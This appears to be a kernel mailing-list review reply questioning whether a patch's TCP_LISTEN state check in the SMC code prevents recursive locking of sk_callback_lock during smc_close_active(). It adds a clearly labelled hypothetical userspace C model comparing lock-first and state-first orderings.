> +	if (READ_ONCE(listen_clcsock->sk_state) != TCP_LISTEN)
> +		return;
> +

In smc_close_active(), the TCP socket remains in the TCP_LISTEN state
while write_lock_bh(&smc->clcsock->sk->sk_callback_lock) is held. The
patch's state check would therefore pass during this window and would not
prevent the recursive locking. It is unclear whether the patch fully
prevents the recursive locking scenario described in the commit message
for this code path in smc_close_active().

Could you describe the exact deadlock scenario and how the patch
addresses it?

>  	read_lock_bh(&listen_clcsock->sk_callback_lock);
>  	lsmc = smc_clcsock_user_data(listen_clcsock);
>  	if (!lsmc)
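Whether an early state check helps depends on ordering. The check only prevents the re-entry if the state has already left TCP_LISTEN by the time the callback runs under the write lock. The hypothetical userspace model below compares the two orderings; all of its names are invented for illustration. For the sake of the sketch, it assumes that a callback does re-enter during the window described above. The thread has not established that this happens in mainline.

```c
#include <assert.h>
#include <stdbool.h>

/* Hypothetical model; none of these names exist in the kernel. */
struct model_sock {
	bool write_locked;  /* role of write_lock_bh(&sk->sk_callback_lock) */
	bool listening;     /* role of sk_state == TCP_LISTEN */
	int would_deadlock; /* callback tried read_lock_bh() under our write lock */
};

/* Patched callback: return early unless the socket is still listening. */
static void model_patched_data_ready(struct model_sock *sk)
{
	if (!sk->listening)
		return;
	if (sk->write_locked)
		sk->would_deadlock++; /* a real read_lock_bh() would spin here */
}

/* Close path. If lock_before_state is set, the write lock is taken while
 * the socket still looks like a listener; otherwise the state changes
 * first. Either way the callback runs while the write lock is held. */
static void model_close(struct model_sock *sk, bool lock_before_state)
{
	if (lock_before_state) {
		sk->write_locked = true;
		model_patched_data_ready(sk); /* state is still "listening" */
		sk->listening = false;
	} else {
		sk->listening = false;
		sk->write_locked = true;
		model_patched_data_ready(sk);
	}
	sk->write_locked = false;
}
```

In the lock-before-state ordering the patched check passes and the model still records a would-be recursive acquisition. Only the state-first ordering is protected.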